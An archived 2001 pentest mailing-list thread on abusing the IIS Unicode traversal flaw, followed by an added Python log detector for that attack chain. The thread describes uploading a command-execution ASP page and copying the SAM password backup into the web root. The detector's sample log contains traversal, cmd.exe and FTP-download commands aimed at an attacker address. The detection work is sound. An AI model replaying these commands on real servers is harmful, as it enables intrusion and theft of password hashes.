Penetration Testing: Re: Pwdump2 with UNICODE?

Re: Pwdump2 with UNICODE?

From: Tony Lambiris <methodic_at_libpcap.net>
Date: Thu, 9 Aug 2001 13:35:27 -0400

Ahh.. so you can basically echo a bunch of ftp commands to a file, run
the ftp client -s:filename.txt to have the box download cmdasp.asp, and
then you can just have that page execute commands?

Nice.

On 08.09.01, "Sapiro, Benjamin R" <bsapiro_at_kpmg.ca> wrote:
> Tony
>
> Under IIS4, CMDASP.asp executes in system level context so you are able to
> do that (CMDASP.asp has nothing to do with the unicode vuln. itself, we just
> use unicode attacks to get script up onto the box). You are right though, a
> unicode executed command by itself runs under IUSR context
>
> Ben Sapiro
> Information Risk Management
> (416) 777-8025
> www.kpmg.ca/irm
>
>
> -----Original Message-----
> From: Tony Lambiris [mailto:methodic_at_libpcap.net]
> Sent: Wednesday, August 08, 2001 1:46 PM
> To: Penetration Testers
> Subject: Re: Pwdump2 with UNICODE?
>
>
> I thought under UNICODE, you aren't able to run such commands as rdisk
> and pwdump, because IIS runs as IUSR?
>
> On 08.07.01, Kevin Lam <kevinlam_at_packet-works.com> wrote:
> > Hi Allen,
> >
> > If you have UNICODE working, you could upload cmdasp.asp which will let
> > you execute commands on that server.
> >
> > If this is NT then what you can do is run "rdisk /s-" to silently update
> > the repair sam._ file (this is a little trick that I used to use when I
> > did pen-testing for Deloitte). Then go to c:\winnt\repair and copy
> > sam._ to say a public internet folder like c:\inetpub\wwwroot and then
> > go to your browser and just download the file.
>

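The chain laid out in this thread (an encoded-traversal request that reaches cmd.exe, a scripted `ftp -s:` download of cmdasp.asp, commands such as `rdisk /s-` issued through that page, and `sam._` being copied into the web root and fetched over HTTP) leaves a recognisable trail in the IIS access log. The following detector is an added example written for this page; it is not code from the thread, from SecurityFocus or from any of the posters. The log format, the field order, the function and indicator names and every log line are constructed for the example; the percent-encoded traversal in the sample URIs is only illustrative, since the detector decodes and normalises each request before matching rather than looking for one particular encoding.

```python
# Added example: flag the post-exploitation indicators discussed in the thread
# in IIS W3C-style access log lines. Everything here (field layout, indicator
# names, sample log) is constructed for illustration.
import re
from urllib.parse import unquote

# Constructed sample, field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2001-08-09 13:01:02 10.0.0.5 GET /default.htm - 200
2001-08-09 13:02:10 10.0.0.9 GET /scripts/..%2f..%2fwinnt/system32/cmd.exe /c+echo+open+10.0.0.9>c:\\ftp.txt 200
2001-08-09 13:02:44 10.0.0.9 GET /scripts/..%2f..%2fwinnt/system32/cmd.exe /c+ftp+-s:c:\\ftp.txt 200
2001-08-09 13:03:15 10.0.0.9 GET /cmdasp.asp - 200
2001-08-09 13:03:40 10.0.0.9 POST /cmdasp.asp - 200
2001-08-09 13:04:02 10.0.0.9 POST /cmdasp.asp cmd=rdisk+/s- 200
2001-08-09 13:05:01 10.0.0.9 GET /sam._ - 200
2001-08-09 13:06:00 10.0.0.5 GET /images/logo.gif - 200
"""


def decode(field: str) -> str:
    """Percent-decode twice (catches double encoding), restore the '+' that IIS
    logs for spaces, and fold case so the checks below are encoding-agnostic."""
    return unquote(unquote(field)).replace("+", " ").lower()


# (indicator name, check(stem, query)); stem and query are already decoded.
INDICATORS = [
    ("path_traversal",      lambda s, q: "../" in s or "..\\" in s),
    ("cmd_exe_via_web",     lambda s, q: "cmd.exe" in s),
    ("ftp_script_download", lambda s, q: re.search(r"\bftp\b.*-s:", q) is not None),
    ("cmdasp_shell",        lambda s, q: s.endswith("/cmdasp.asp")),
    ("rdisk_sam_refresh",   lambda s, q: re.search(r"\brdisk\b", s + " " + q) is not None),
    ("sam_backup_served",   lambda s, q: s.rsplit("/", 1)[-1] in ("sam._", "sam")),
]


def parse_line(line: str):
    """Split one W3C-style line into a record; returns None for comments/short lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 7:
        return None
    date, time, client, method, stem, query, status = parts[:7]
    return {
        "time": f"{date} {time}",
        "client": client,
        "method": method,
        "stem": decode(stem),
        "query": "" if query == "-" else decode(query),
        "status": status,
    }


def scan(log_text: str):
    """Return one record per log line that trips at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        matched = [name for name, check in INDICATORS if check(rec["stem"], rec["query"])]
        if matched:
            hits.append({**rec, "indicators": matched})
    return hits


def chain_by_client(hits):
    """Group indicators per client IP. A client that shows several stages
    (traversal -> scripted download -> cmdasp -> rdisk -> sam._) is the one to
    escalate first, rather than treating each line as an isolated event."""
    chain = {}
    for h in hits:
        chain.setdefault(h["client"], set()).update(h["indicators"])
    return {ip: sorted(names) for ip, names in chain.items()}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["time"], h["client"], h["method"], h["stem"], ", ".join(h["indicators"]))
    print(chain_by_client(found))
```

Decoding before matching is the point: the issue the thread calls "UNICODE" was exactly that an encoded path slipped past string checks that looked for literal `..`, so a detector that matches raw log text would miss the same requests. On the mitigation side the thread itself names the levers: the command-execution step only works because a script like cmdasp.asp can be placed in the web root and, on IIS4, runs as SYSTEM, so removing sample and upload scripts, running the web server under a least-privilege account, and alerting on unexpected files (such as `sam._`) appearing under `c:\inetpub\wwwroot` close the chain at its weakest links.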
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Received on Aug 09 2001
